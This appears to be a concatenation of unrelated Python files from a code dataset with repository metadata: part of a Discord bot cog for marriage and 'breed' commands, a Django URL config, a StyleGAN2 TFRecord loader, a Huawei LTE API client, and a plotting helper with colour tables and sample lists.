ctx.author.id,
)
is None
):
return await ctx.send(
"You can't divorce someone you're not married to.", delete_after=30
)
await self.bot.pool.execute(
"DELETE FROM marriages WHERE user1_id = $1 OR user2_id = $1",
ctx.author.id,
)
await self.bot.pool.execute(
"DELETE FROM children WHERE lover1_id = $1 OR lover2_id = $1",
ctx.author.id,
)
await ctx.send(broken_heartt)
@commands.command(
description="Check who you are married to", brief="Check who you married"
)
async def marriage(self, ctx):
married = await self.bot.pool.fetchrow(
"SELECT user1_id, user2_id, time_married FROM marriages WHERE user1_id = $1 OR user2_id = $1",
ctx.author.id,
)
if married is None:
return await ctx.caution("You are not married.")
if married["user1_id"] == ctx.author.id:
user = self.bot.get_user(married["user2_id"])
else:
user = self.bot.get_user(married["user1_id"])
marriage_time = datetime.now(timezone.utc) - married["time_married"]
await ctx.send(
f"""You have been married to {user.name} since {married['time_married'].strftime("%X at %x")} ({marriage_time.days}d)."""
)
@commands.command(
descritpion="Breed with your lover",
aliases=["sex", "fuck", "<---_that_is_so_funny_hahahahhahahaha"],
brief="Breed",
)
async def breed(self, ctx):
async with self.bot.pool.acquire() as conn:
children = await conn.fetchval(
"SELECT COUNT(*) FROM children WHERE lover1_id = $1 OR lover2_id = $1",
ctx.author.id,
)
marriage = await conn.fetchrow(
"SELECT user1_id, user2_id FROM marriages WHERE user1_id = $1 OR user2_id = $1",
ctx.author.id,
)
if marriage is None:
return await ctx.caution("You aren't married")
if children >= 5:
return await ctx.caution(
"You already have 5 children. Are you crazy wanting more?"
)
if marriage["user1_id"] == ctx.author.id:
user = self.bot.get_user(marriage["user2_id"])
else:
user = self.bot.get_user(marriage["user1_id"])
asking = await ctx.send(
f"""{ctx.author.name} would like to breed with {user.name}. {user.name} reply with "I do" for yes and "No" for no."""
)
await self.bot.redis.execute(
"SET",
f"{ctx.author.id}-{ctx.command.qualified_name}",
"cooldown",
"EX",
3600,
)
def check(amsg):
return amsg.author.id == user.id
try:
breed_choice = await self.bot.wait_for(
"message", timeout=30, check=check
)
except asyncio.TimeoutError:
await asking.delete()
await self.bot.redis.execute(
"DEL", f"{ctx.author.id}-{ctx.command.qualified_name}"
)
return await ctx.send(
f"{user.name} does not want to make a child with you."
)
if breed_choice.content.lower() == "i do":
if randint(1, 2) == 1:
await asking.delete()
await ctx.send("You didn't successfully make a child.")
else:
gender = choice(["male", "female"])
if gender == "male":
await asking.delete()
congrats = await ctx.send(
"Your efforts were successful! He's a male! Please enter the babies name."
)
else:
await asking.delete()
congrats = await ctx.send(
"Your efforts were successful! She's a female! Please enter the babies name."
)
def check(amsg):
return (
amsg.author.id == ctx.author.id or amsg.author.id == user.id
)
try:
baby_name = await self.bot.wait_for(
"message", timeout=30, check=check
)
except asyncio.TimeoutError:
await asking.delete()
await self.bot.redis.execute(
"DEL", f"{ctx.author.id}-{ctx.command.qualified_name}"
)
return await ctx.send(
f"No name was provided in time.", delete_after=30
)
if len(baby_name.content) < 3 or len(baby_name.content) > 50:
await self.bot.redis.execute(
"DEL", f"{ctx.author.id}-{ctx.command.qualified_name}"
)
return await ctx.caution(
"The name must be more then 3 chars long and can't be longer then 50 chars."
)
await self.bot.pool.execute(
"INSERT INTO children (lover1_id, lover2_id, child_name, age, gender) VALUES ($1, $2, $3, $4, $5)",
ctx.author.id,
user.id,
baby_name.content,
0,
gender,
)
await congrats.delete()
await ctx.send(
f"Great name! Good luck with your newborn {baby_name.content}.".replace(
"@", "@\u200b"
)
)
if breed_choice.content.lower() == "no":
await asking.delete()
await self.bot.redis.execute(
"DEL", f"{ctx.author.id}-{ctx.command.qualified_name}"
)
return await ctx.send(f"{user.name} does not want to have a child.")
await asking.delete()
await self.bot.redis.execute(
"DEL", f"{ctx.author.id}-{ctx.command.qualified_name}"
)
await ctx.caution("Invalid choice. Did you type it properly?")
@commands.command(description="Check your family")
async def family(self, ctx):
async with self.bot.pool.acquire() as conn:
children = await conn.fetch(
"SELECT * FROM children WHERE lover1_id = $1 OR lover2_id = $1",
ctx.author.id,
)
marriage = await conn.fetchrow(
"SELECT user1_id, user2_id, time_married FROM marriages WHERE user1_id = $1 OR user2_id = $1",
ctx.author.id,
)
if marriage is None:
return await ctx.caution("You aren't married")
if marriage["user1_id"] == ctx.author.id:
user = self.bot.get_user(marriage["user2_id"])
else:
user = self.bot.get_user(marriage["user1_id"])
marriage_time = datetime.now(timezone.utc) - marriage["time_married"]
e = discord.Embed(colour=0x7289DA)
e.set_author(name=f"{user.name} is married to {ctx.author.name}")
e.set_footer(
text=f"Married {marriage['time_married'].strftime('%x on %X')} ({marriage_time.days}d)"
)
num = 0
for i in children:
e.add_field(
name=children[num]["child_name"],
value=f"Gender {children[num]['gender']}; Age {children[num]['age']}; Born {children[num]['birthdate'].strftime('%x on %X')}",
)
num += 1
if num == 0:
e.add_field(
name="No children",
value=f"{user.name} and {ctx.author.name} have no children.",
)
await ctx.send(embed=e)
@commands.command(description="Bday!", aliases=["bd", "bday"], hidden=True)
async def birthday(self, ctx):
async with self.bot.pool.acquire() as conn:
children = await conn.fetchrow(
"SELECT child_name, age, gender, last_bd FROM children WHERE lover1_id = $1 OR lover2_id = $1 ORDER BY RANDOM() LIMIT 1",
ctx.author.id,
)
if children is None:
return await ctx.caution("You have no children.")
user_cooldown = await ctx.bot.redis.pttl(
f"{ctx.author.id}-{ctx.command.qualified_name}-{children['child_name']}"
)
if user_cooldown == -2:
marriage = await conn.fetchrow(
"SELECT user1_id, user2_id, time_married FROM marriages WHERE user1_id = $1 OR user2_id = $1",
ctx.author.id,
)
if marriage is None:
return await ctx.caution("You aren't married.")
await self.bot.redis.execute(
"SET",
f"{ctx.author.id}-{ctx.command.qualified_name}-{children['child_name']}",
"cooldown",
"EX",
2_630_000,
)
gender = "He"
if children["gender"] == "female":
gender = "She"
pre_enjy_msg = await ctx.send(
f"It's {children['child_name']}'s birthday! {gender} will be turning {children['age'] + 1}"
)
enjoyment_lvl = [
f"{children['child_name']} loved the birthday party!",
f"{children['child_name']} didn't enjoy the party.",
f"{children['child_name']} thinks that was the best party ever!",
f"{ctx.author.name} loves uwu",
]
await asyncio.sleep(4)
enjy = choice(enjoyment_lvl)
await pre_enjy_msg.delete()
time = timedelta(seconds=2_630_000) + datetime.utcnow()
await conn.execute(
"UPDATE children SET age = children.age + 1, last_bd = $1 WHERE child_name = $2",
time,
children["child_name"],
)
await ctx.send(enjy)
else:
base_time = user_cooldown
seconds = round(base_time, 2)
hours, remainder = divmod(int(seconds), 3600)
minutes, seconds = divmod(remainder, 60)
await ctx.caution(
f"{children['child_name']} already had there birthday within the last month"
)
def setup(bot):
bot.add_cog(marriage(bot))
| 41.554622
| 173
| 0.49363
|
794e234301e2e42c8a568c2cfd3640dce94809a7
| 557
|
py
|
Python
|
concursinhos/urls.py
|
gmendonc/concursinhos-dev
|
24e6fe6917d6a844175f64b20ba5166b88ea93b4
|
[
"Unlicense",
"MIT"
] | null | null | null |
concursinhos/urls.py
|
gmendonc/concursinhos-dev
|
24e6fe6917d6a844175f64b20ba5166b88ea93b4
|
[
"Unlicense",
"MIT"
] | null | null | null |
concursinhos/urls.py
|
gmendonc/concursinhos-dev
|
24e6fe6917d6a844175f64b20ba5166b88ea93b4
|
[
"Unlicense",
"MIT"
] | null | null | null |
from django.conf.urls import patterns, include, url
from django.contrib import admin
from django.conf import settings
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'concursinhos.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
#url(r'^$', include('quiz.urls')),
url(r'^quiz/', include('quiz.urls')),
url(r'^admin/', include(admin.site.urls)),
)
if settings.DEBUG:
urlpatterns += patterns('',
(r'^media/(?P<path>.*)$', 'django.views.static.serve', {'document_root': settings.MEDIA_ROOT}),
)
| 29.315789
| 103
| 0.628366
|
794e240470229cb6a11eb83066b5147fddb11c87
| 10,080
|
py
|
Python
|
training/dataset.py
|
LightNormal/StyleGAN2withGUI
|
d2ffa81a4e7b2b779423bb854230863d57f0eb85
|
[
"BSD-Source-Code"
] | 4
|
2020-07-16T00:49:03.000Z
|
2021-02-23T23:42:02.000Z
|
training/dataset.py
|
LightNormal/StyleGAN2withGUI
|
d2ffa81a4e7b2b779423bb854230863d57f0eb85
|
[
"BSD-Source-Code"
] | null | null | null |
training/dataset.py
|
LightNormal/StyleGAN2withGUI
|
d2ffa81a4e7b2b779423bb854230863d57f0eb85
|
[
"BSD-Source-Code"
] | 1
|
2020-12-09T12:02:04.000Z
|
2020-12-09T12:02:04.000Z
|
# Copyright (c) 2019, NVIDIA Corporation. All rights reserved.
#
# This work is made available under the Nvidia Source Code License-NC.
# To view a copy of this license, visit
# https://nvlabs.github.io/stylegan2/license.html
"""Multi-resolution input data pipeline."""
import os
import glob
import numpy as np
import tensorflow as tf
import dnnlib
import dnnlib.tflib as tflib
#----------------------------------------------------------------------------
# Dataset class that loads data from tfrecords files.
class TFRecordDataset:
def __init__(self,
tfrecord_dir, # Directory containing a collection of tfrecords files.
resolution = None, # Dataset resolution, None = autodetect.
label_file = None, # Relative path of the labels file, None = autodetect.
max_label_size = 0, # 0 = no labels, 'full' = full labels, <int> = N first label components.
max_images = None, # Maximum number of images to use, None = use all images.
repeat = True, # Repeat dataset indefinitely?
shuffle_mb = 4096, # Shuffle data within specified window (megabytes), 0 = disable shuffling.
prefetch_mb = 2048, # Amount of data to prefetch (megabytes), 0 = disable prefetching.
buffer_mb = 256, # Read buffer size (megabytes).
num_threads = 2): # Number of concurrent threads.
self.tfrecord_dir = tfrecord_dir
self.resolution = None
self.resolution_log2 = None
self.shape = [] # [channels, height, width]
self.dtype = 'uint8'
self.dynamic_range = [0, 255]
self.label_file = label_file
self.label_size = None # components
self.label_dtype = None
self._np_labels = None
self._tf_minibatch_in = None
self._tf_labels_var = None
self._tf_labels_dataset = None
self._tf_datasets = dict()
self._tf_iterator = None
self._tf_init_ops = dict()
self._tf_minibatch_np = None
self._cur_minibatch = -1
self._cur_lod = -1
# List tfrecords files and inspect their shapes.
assert os.path.isdir(self.tfrecord_dir)
tfr_files = sorted(glob.glob(os.path.join(self.tfrecord_dir, '*.tfrecords')))
assert len(tfr_files) >= 1
tfr_shapes = []
for tfr_file in tfr_files:
tfr_opt = tf.python_io.TFRecordOptions(tf.python_io.TFRecordCompressionType.NONE)
for record in tf.python_io.tf_record_iterator(tfr_file, tfr_opt):
tfr_shapes.append(self.parse_tfrecord_np(record).shape)
break
# Autodetect label filename.
if self.label_file is None:
guess = sorted(glob.glob(os.path.join(self.tfrecord_dir, '*.labels')))
if len(guess):
self.label_file = guess[0]
elif not os.path.isfile(self.label_file):
guess = os.path.join(self.tfrecord_dir, self.label_file)
if os.path.isfile(guess):
self.label_file = guess
# Determine shape and resolution.
max_shape = max(tfr_shapes, key=np.prod)
self.resolution = resolution if resolution is not None else max_shape[1]
self.resolution_log2 = int(np.log2(self.resolution))
self.shape = [max_shape[0], self.resolution, self.resolution]
tfr_lods = [self.resolution_log2 - int(np.log2(shape[1])) for shape in tfr_shapes]
assert all(shape[0] == max_shape[0] for shape in tfr_shapes)
assert all(shape[1] == shape[2] for shape in tfr_shapes)
assert all(shape[1] == self.resolution // (2**lod) for shape, lod in zip(tfr_shapes, tfr_lods))
assert all(lod in tfr_lods for lod in range(self.resolution_log2 - 1))
# Load labels.
assert max_label_size == 'full' or max_label_size >= 0
self._np_labels = np.zeros([1<<30, 0], dtype=np.float32)
if self.label_file is not None and max_label_size != 0:
self._np_labels = np.load(self.label_file)
assert self._np_labels.ndim == 2
if max_label_size != 'full' and self._np_labels.shape[1] > max_label_size:
self._np_labels = self._np_labels[:, :max_label_size]
if max_images is not None and self._np_labels.shape[0] > max_images:
self._np_labels = self._np_labels[:max_images]
self.label_size = self._np_labels.shape[1]
self.label_dtype = self._np_labels.dtype.name
# Build TF expressions.
with tf.name_scope('Dataset'), tf.device('/cpu:0'):
self._tf_minibatch_in = tf.placeholder(tf.int64, name='minibatch_in', shape=[])
self._tf_labels_var = tflib.create_var_with_large_initial_value(self._np_labels, name='labels_var')
self._tf_labels_dataset = tf.data.Dataset.from_tensor_slices(self._tf_labels_var)
for tfr_file, tfr_shape, tfr_lod in zip(tfr_files, tfr_shapes, tfr_lods):
if tfr_lod < 0:
continue
dset = tf.data.TFRecordDataset(tfr_file, compression_type='', buffer_size=buffer_mb<<20)
if max_images is not None:
dset = dset.take(max_images)
dset = dset.map(self.parse_tfrecord_tf, num_parallel_calls=num_threads)
dset = tf.data.Dataset.zip((dset, self._tf_labels_dataset))
bytes_per_item = np.prod(tfr_shape) * np.dtype(self.dtype).itemsize
if shuffle_mb > 0:
dset = dset.shuffle(((shuffle_mb << 20) - 1) // bytes_per_item + 1)
if repeat:
dset = dset.repeat()
if prefetch_mb > 0:
dset = dset.prefetch(((prefetch_mb << 20) - 1) // bytes_per_item + 1)
dset = dset.batch(self._tf_minibatch_in)
self._tf_datasets[tfr_lod] = dset
self._tf_iterator = tf.data.Iterator.from_structure(self._tf_datasets[0].output_types, self._tf_datasets[0].output_shapes)
self._tf_init_ops = {lod: self._tf_iterator.make_initializer(dset) for lod, dset in self._tf_datasets.items()}
def close(self):
pass
# Use the given minibatch size and level-of-detail for the data returned by get_minibatch_tf().
def configure(self, minibatch_size, lod=0):
lod = int(np.floor(lod))
assert minibatch_size >= 1 and lod in self._tf_datasets
if self._cur_minibatch != minibatch_size or self._cur_lod != lod:
self._tf_init_ops[lod].run({self._tf_minibatch_in: minibatch_size})
self._cur_minibatch = minibatch_size
self._cur_lod = lod
# Get next minibatch as TensorFlow expressions.
def get_minibatch_tf(self): # => images, labels
return self._tf_iterator.get_next()
# Get next minibatch as NumPy arrays.
def get_minibatch_np(self, minibatch_size, lod=0): # => images, labels
self.configure(minibatch_size, lod)
with tf.name_scope('Dataset'):
if self._tf_minibatch_np is None:
self._tf_minibatch_np = self.get_minibatch_tf()
return tflib.run(self._tf_minibatch_np)
# Get random labels as TensorFlow expression.
def get_random_labels_tf(self, minibatch_size): # => labels
with tf.name_scope('Dataset'):
if self.label_size > 0:
with tf.device('/cpu:0'):
return tf.gather(self._tf_labels_var, tf.random_uniform([minibatch_size], 0, self._np_labels.shape[0], dtype=tf.int32))
return tf.zeros([minibatch_size, 0], self.label_dtype)
# Get random labels as NumPy array.
def get_random_labels_np(self, minibatch_size): # => labels
if self.label_size > 0:
return self._np_labels[np.random.randint(self._np_labels.shape[0], size=[minibatch_size])]
return np.zeros([minibatch_size, 0], self.label_dtype)
# Parse individual image from a tfrecords file into TensorFlow expression.
@staticmethod
def parse_tfrecord_tf(record):
features = tf.parse_single_example(record, features={
'shape': tf.FixedLenFeature([3], tf.int64),
'data': tf.FixedLenFeature([], tf.string)})
data = tf.decode_raw(features['data'], tf.uint8)
return tf.reshape(data, features['shape'])
# Parse individual image from a tfrecords file into NumPy array.
@staticmethod
def parse_tfrecord_np(record):
ex = tf.train.Example()
ex.ParseFromString(record)
shape = ex.features.feature['shape'].int64_list.value # pylint: disable=no-member
data = ex.features.feature['data'].bytes_list.value[0] # pylint: disable=no-member
return np.fromstring(data, np.uint8).reshape(shape)
#----------------------------------------------------------------------------
# Helper func for constructing a dataset object using the given options.
def load_dataset(class_name=None, data_dir=None, verbose=False, **kwargs):
kwargs = dict(kwargs)
if 'tfrecord_dir' in kwargs:
if class_name is None:
class_name = __name__ + '.TFRecordDataset'
if data_dir is not None:
kwargs['tfrecord_dir'] = os.path.join(data_dir, kwargs['tfrecord_dir'])
assert class_name is not None
if verbose:
print('Streaming data using %s...' % class_name)
dataset = dnnlib.util.get_obj_by_name(class_name)(**kwargs)
if verbose:
print('Dataset shape =', np.int32(dataset.shape).tolist())
print('Dynamic range =', dataset.dynamic_range)
print('Label size =', dataset.label_size)
return dataset
#----------------------------------------------------------------------------
| 50.4
| 140
| 0.605456
|
794e2422dd9cf0c29d4aa32ecdaed24ce4872b12
| 6,276
|
py
|
Python
|
3rdparty/huawei-lte-api/huawei_lte_api/Client.py
|
tux1c0/plugin-huawei4g
|
af83ce6321db23fcfd51eb204e00c287d3ea2325
|
[
"MIT"
] | null | null | null |
3rdparty/huawei-lte-api/huawei_lte_api/Client.py
|
tux1c0/plugin-huawei4g
|
af83ce6321db23fcfd51eb204e00c287d3ea2325
|
[
"MIT"
] | 1
|
2020-06-21T20:35:27.000Z
|
2020-07-14T20:08:55.000Z
|
3rdparty/huawei-lte-api/huawei_lte_api/Client.py
|
tux1c0/plugin-huawei4g
|
af83ce6321db23fcfd51eb204e00c287d3ea2325
|
[
"MIT"
] | 3
|
2020-02-27T11:35:55.000Z
|
2021-03-25T08:51:51.000Z
|
from huawei_lte_api.Connection import Connection
from huawei_lte_api.api.Device import Device
from huawei_lte_api.api.User import User
from huawei_lte_api.api.Monitoring import Monitoring
from huawei_lte_api.api.Security import Security
from huawei_lte_api.api.WebServer import WebServer
from huawei_lte_api.api.WLan import WLan
from huawei_lte_api.api.Cradle import Cradle
from huawei_lte_api.api.Pin import Pin
from huawei_lte_api.config.DialUp import DialUp as DialUpConfig
from huawei_lte_api.config.Global import Global
from huawei_lte_api.config.Lan import Lan as LanConfig
from huawei_lte_api.config.Network import Network as NetworkConfig
from huawei_lte_api.config.Pincode import Pincode as PincodeConfig
from huawei_lte_api.config.Sms import Sms as SmsConfig
from huawei_lte_api.config.Voice import Voice
from huawei_lte_api.config.Wifi import Wifi as WifiConfig
from huawei_lte_api.config.PcAssistant import PcAssistant
from huawei_lte_api.config.DeviceInformation import DeviceInformation
from huawei_lte_api.config.WebUICfg import WebUICfg
from huawei_lte_api.config.Device import Device as DeviceConfig
from huawei_lte_api.config.FastBoot import FastBoot
from huawei_lte_api.config.Firewall import Firewall
from huawei_lte_api.config.IPv6 import IPv6
from huawei_lte_api.config.Ota import Ota as OtaConfig
from huawei_lte_api.config.Pb import Pb as PbConfig
from huawei_lte_api.config.Sntp import Sntp
from huawei_lte_api.config.Statistic import Statistic as ConfigStatistic
from huawei_lte_api.config.Stk import Stk
from huawei_lte_api.config.Update import Update
from huawei_lte_api.config.UPnp import UPnp
from huawei_lte_api.config.Ussd import Ussd
from huawei_lte_api.config.WebSd import WebSd
from huawei_lte_api.usermanual.PublicSysResources import PublicSysResources
from huawei_lte_api.api.Ota import Ota
from huawei_lte_api.api.Net import Net
from huawei_lte_api.api.DialUp import DialUp
from huawei_lte_api.api.Sms import Sms
from huawei_lte_api.api.Redirection import Redirection
from huawei_lte_api.api.VSim import VSim
from huawei_lte_api.api.FileManager import FileManager
from huawei_lte_api.api.Dhcp import Dhcp
from huawei_lte_api.api.DDns import DDns
from huawei_lte_api.api.Diagnosis import Diagnosis
from huawei_lte_api.api.SNtp import SNtp
from huawei_lte_api.api.OnlineUpdate import OnlineUpdate
from huawei_lte_api.api.Log import Log
from huawei_lte_api.api.Time import Time
from huawei_lte_api.api.SdCard import SdCard
from huawei_lte_api.api.UsbStorage import UsbStorage
from huawei_lte_api.api.UsbPrinter import UsbPrinter
from huawei_lte_api.api.Vpn import Vpn
from huawei_lte_api.api.Ntwk import Ntwk
from huawei_lte_api.api.Global import Global as Global_
from huawei_lte_api.api.Pb import Pb
from huawei_lte_api.api.Host import Host
from huawei_lte_api.api.Language import Language
from huawei_lte_api.api.Syslog import Syslog
from huawei_lte_api.api.Voice import Voice as Voice_
from huawei_lte_api.api.Cwmp import Cwmp
from huawei_lte_api.api.Lan import Lan
from huawei_lte_api.api.Led import Led
from huawei_lte_api.api.Statistic import Statistic
from huawei_lte_api.api.TimeRule import TimeRule
from huawei_lte_api.api.Bluetooth import Bluetooth
from huawei_lte_api.api.MLog import MLog
class Client:
def __init__(self, connection: Connection): # pylint: disable=too-many-statements
self.monitoring = Monitoring(connection)
self.security = Security(connection)
self.webserver = WebServer(connection)
self.global_ = Global_(connection)
self.wlan = WLan(connection)
self.cradle = Cradle(connection)
self.pin = Pin(connection)
self.config_dialup = DialUpConfig(connection)
self.config_global = Global(connection)
self.config_lan = LanConfig(connection)
self.config_network = NetworkConfig(connection)
self.config_pincode = PincodeConfig(connection)
self.config_sms = SmsConfig(connection)
self.config_voice = Voice(connection)
self.config_wifi = WifiConfig(connection)
self.config_pc_assistant = PcAssistant(connection)
self.config_device_information = DeviceInformation(connection)
self.config_web_ui_cfg = WebUICfg(connection)
self.config_device = DeviceConfig(connection)
self.config_fast_boot = FastBoot(connection)
self.config_firewall = Firewall(connection)
self.config_ipv6 = IPv6(connection)
self.config_ota = OtaConfig(connection)
self.config_pb = PbConfig(connection)
self.config_sntp = Sntp(connection)
self.config_statistic = ConfigStatistic(connection)
self.config_stk = Stk(connection)
self.config_update = Update(connection)
self.config_u_pnp = UPnp(connection)
self.config_ussd = Ussd(connection)
self.config_web_sd = WebSd(connection)
self.usermanual_public_sys_resources = PublicSysResources(connection)
self.ota = Ota(connection)
self.net = Net(connection)
self.dial_up = DialUp(connection)
self.sms = Sms(connection)
self.redirection = Redirection(connection)
self.v_sim = VSim(connection)
self.file_manager = FileManager(connection)
self.dhcp = Dhcp(connection)
self.d_dns = DDns(connection)
self.diagnosis = Diagnosis(connection)
self.s_ntp = SNtp(connection)
self.user = User(connection)
self.device = Device(connection)
self.online_update = OnlineUpdate(connection)
self.log = Log(connection)
self.time = Time(connection)
self.sd_card = SdCard(connection)
self.usb_storage = UsbStorage(connection)
self.usb_printer = UsbPrinter(connection)
self.vpn = Vpn(connection)
self.ntwk = Ntwk(connection)
self.pb = Pb(connection)
self.host = Host(connection)
self.language = Language(connection)
self.syslog = Syslog(connection)
self.voice = Voice_(connection)
self.cwmp = Cwmp(connection)
self.lan = Lan(connection)
self.led = Led(connection)
self.statistic = Statistic(connection)
self.timerule = TimeRule(connection)
self.bluetooth = Bluetooth(connection)
self.mlog = MLog(connection)
| 46.147059
| 86
| 0.773582
|
794e24f954bf9531a4ba99da6cffc088d9380a79
| 12,526
|
py
|
Python
|
scripts/NGS/plotutils.py
|
shivankurkapoor/moleculardating
|
4a72c3e92a09ab321e0d92840cc7619857bbab8a
|
[
"BSD-3-Clause"
] | 1
|
2018-04-24T04:38:33.000Z
|
2018-04-24T04:38:33.000Z
|
scripts/NGS/plotutils.py
|
shivankurkapoor/molecular-dating
|
4a72c3e92a09ab321e0d92840cc7619857bbab8a
|
[
"BSD-3-Clause"
] | null | null | null |
scripts/NGS/plotutils.py
|
shivankurkapoor/molecular-dating
|
4a72c3e92a09ab321e0d92840cc7619857bbab8a
|
[
"BSD-3-Clause"
] | null | null | null |
cnames = {
'palegoldenrod': '#EEE8AA',
'palegreen': '#98FB98',
'paleturquoise': '#AFEEEE',
'palevioletred': '#DB7093',
'papayawhip': '#FFEFD5',
'peachpuff': '#FFDAB9',
'peru': '#CD853F',
'pink': '#FFC0CB',
'plum': '#DDA0DD',
'powderblue': '#B0E0E6',
'purple': '#800080',
'red': '#FF0000',
'rosybrown': '#BC8F8F',
'royalblue': '#4169E1',
'saddlebrown': '#8B4513',
'salmon': '#FA8072',
'sandybrown': '#FAA460',
'seagreen': '#2E8B57',
'seashell': '#FFF5EE',
'darkblue': '#00008B',
'darkcyan': '#008B8B',
'darkgoldenrod': '#B8860B',
'darkgreen': '#006400',
'darkkhaki': '#BDB76B',
'darkmagenta': '#8B008B',
'darkolivegreen': '#556B2F',
'darkorange': '#FF8C00',
'darkorchid': '#9932CC',
'darkred': '#8B0000',
'darksalmon': '#E9967A',
'darkseagreen': '#8FBC8F',
'darkslateblue': '#483D8B',
'darkturquoise': '#00CED1',
'darkviolet': '#9400D3',
'deeppink': '#FF1493',
'deepskyblue': '#00BFFF',
'dodgerblue': '#1E90FF',
'firebrick': '#B22222',
'forestgreen': '#228B22',
'fuchsia': '#FF00FF',
'gainsboro': '#DCDCDC',
'gold': '#FFD700',
'goldenrod': '#DAA520',
'green': '#008000',
'hotpink': '#FF69B4',
'indianred': '#CD5C5C',
'indigo': '#4B0082',
'ivory': '#FFFFF0',
'khaki': '#F0E68C',
'lawngreen': '#7CFC00',
'lemonchiffon': '#FFFACD',
'aliceblue': '#F0F8FF',
'aqua': '#00FFFF',
'aquamarine': '#7FFFD4',
'azure': '#F0FFFF',
'beige': '#F5F5DC',
'black': '#000000',
'blanchedalmond': '#FFEBCD',
'blue': '#0000FF',
'blueviolet': '#8A2BE2',
'brown': '#A52A2A',
'burlywood': '#DEB887',
'cadetblue': '#5F9EA0',
'chartreuse': '#7FFF00',
'chocolate': '#D2691E',
'coral': '#FF7F50',
'crimson': '#DC143C',
'cyan': '#00FFFF',
'lime': '#00FF00',
'limegreen': '#32CD32',
'linen': '#FAF0E6',
'magenta': '#FF00FF',
'maroon': '#800000',
'midnightblue': '#191970',
'mintcream': '#F5FFFA',
'mistyrose': '#FFE4E1',
'moccasin': '#FFE4B5',
'navy': '#000080',
'oldlace': '#FDF5E6',
'olive': '#808000',
'olivedrab': '#6B8E23',
'orange': '#FFA500',
'orangered': '#FF4500',
'orchid': '#DA70D6',
'sienna': '#A0522D',
'silver': '#C0C0C0',
'skyblue': '#87CEEB',
'slateblue': '#6A5ACD',
'springgreen': '#00FF7F',
'steelblue': '#4682B4',
'teal': '#008080',
'thistle': '#D8BFD8',
'tomato': '#FF6347',
'turquoise': '#40E0D0',
'violet': '#EE82EE',
'mediumaquamarine': '#66CDAA',
'mediumblue': '#0000CD',
'mediumorchid': '#BA55D3',
'mediumpurple': '#9370DB',
'mediumseagreen': '#3CB371',
'mediumslateblue': '#7B68EE',
'mediumspringgreen': '#00FA9A',
'mediumturquoise': '#48D1CC',
'mediumvioletred': '#C71585',
}
filled_markers = [u'o', u'v', u'^', u'<', u'>', u'8', u's', u'p', u'*', u'h', u'H', u'D', u'd']
'''
Points with S2 <=5.0
'''
tuplist = [('CH256', 0),
('CH256', 172),
('CH256', 426),
('CH256', 684),
('CH256', 28),
('CH256', 63),
('PIC83747', 0),
('PIC83747', 6),
('PIC83747', 50),
('PIC90770', 193),
('PIC90770', 8),
('PIC90770', 96),
('PIC90770', 12),
('PIC90770', 125),
('R880F', 0),
('R880F', 147),
('R880F', 63),
('CH470', 0),
('CH470', 41),
('CH470', 13),
('CH470', 174),
('CH470', 69),
('CH159', 0),
('CH159', 648),
('CH159', 12),
('CH159', 302),
('CH159', 8),
('CH159', 85),
('CH159', 22),
('CH159', 56),
('CH159', 29),
('9004SS', 0),
('9004SS', 29),
('CAP239', 0),
('CAP239', 119),
('CAP210', 0),
('CAP210', 168),
('CAP210', 140),
('CAP210', 70),
('SUMA', 0),
('SUMA', 1),
('SUMA', 30),
('SUMA', 16),
('SUMA', 9),
('CH131', 0),
('CH131', 34),
('CH131', 333),
('CH131', 175),
('CH131', 273),
('CH131', 21),
('CH131', 91),
('CH131', 28),
('CH131', 670),
('CH131', 63),
('1056', 0),
('1056', 3),
('1056', 7),
('1058', 0),
('1058', 10),
('1058', 3),
('1059', 0),
('1059', 4),
('1059', 7),
('CH042', 0),
('CH042', 676),
('CH042', 424),
('CH042', 172),
('CH042', 21),
('CH042', 60),
('CH040', 0),
('CH040', 45),
('CH040', 412),
('CH040', 111),
('CAP45', 0),
('CAP45', 21),
('CH185', 0),
('CH185', 25),
('CH185', 67),
('CH185', 416),
('CH185', 180),
('K84', 0),
('K84', 24),
('6247', 0),
('6247', 2),
('R053', 0),
('R053', 8),
('R526', 0),
('R526', 65),
('703010200', 0),
('CH164', 0),
('CH164', 169),
('CH164', 420),
('CH164', 14),
('CH164', 56),
('WEAU', 0),
('WEAU', 8),
('WEAU', 29),
('WEAU', 197),
('WEAU', 15),
('CH162', 0),
('CH162', 179),
('CH162', 21),
('CH162', 438),
('CH162', 77),
('H386', 0),
('H386', 9),
('PIC55751', 0),
('191647', 0),
('191647', 127),
('PIC1362', 0),
('H408', 0),
('PIC38417', 0),
('PIC38417', 8),
('PIC71101', 0),
('PIC71101', 37),
('PIC71101', 6),
('PIC71101', 174),
('PIC71101', 14),
('PIC71101', 120),
('TT31P', 0),
('TT31P', 11),
('CH198', 0),
('CH198', 11),
('CH198', 60),
('CH198', 447),
('PIC38051', 0),
('PIC38051', 4),
('CH077', 0),
('CH077', 32),
('CH077', 14),
('CH077', 159),
('CH058', 0),
('CH058', 76),
('CH058', 36),
('CH607', 0),
('CH607', 21),
('CH607', 14),
('R463F', 0),
('R463F', 7),
('R463F', 236),
('R463F', 48),
]
# S2<=5
type_list = [('CH256', 0, 'Single'),
('CH256', 172, 'Single'),
('CH256', 426, 'Single'),
('CH256', 684, 'Single'),
('CH256', 28, 'Single'),
('CH256', 63, 'Single'),
('PIC83747', 0, 'Multiple'),
('PIC83747', 6, 'Multiple'),
('PIC83747', 50, 'Multiple'),
('PIC90770', 193, 'Multiple'),
('PIC90770', 8, 'Multiple'),
('PIC90770', 96, 'Multiple'),
('PIC90770', 12, 'Multiple'),
('PIC90770', 125, 'Multiple'),
('R880F', 0, 'Single'),
('R880F', 147, 'Single'),
('R880F', 63, 'Single'),
('CH470', 0, 'Single'),
('CH470', 41, 'Single'),
('CH470', 13, 'Single'),
('CH470', 174, 'Single'),
('CH470', 69, 'Single'),
('CH159', 0, 'Single'),
('CH159', 648, 'Single'),
('CH159', 12, 'Single'),
('CH159', 302, 'Single'),
('CH159', 8, 'Single'),
('CH159', 85, 'Single'),
('CH159', 22, 'Single'),
('CH159', 56, 'Single'),
('CH159', 29, 'Single'),
('9004SS', 0, 'Single'),
('9004SS', 29, 'Single'),
('CAP239', 0, 'Single'),
('CAP239', 119, 'Single'),
('CAP210', 0, 'Single'),
('CAP210', 168, 'Single'),
('CAP210', 140, 'Single'),
('CAP210', 70, 'Single'),
('SUMA', 0, 'Single'),
('SUMA', 1, 'Single'),
('SUMA', 30, 'Single'),
('SUMA', 16, 'Single'),
('SUMA', 9, 'Single'),
('CH131', 0, 'Single'),
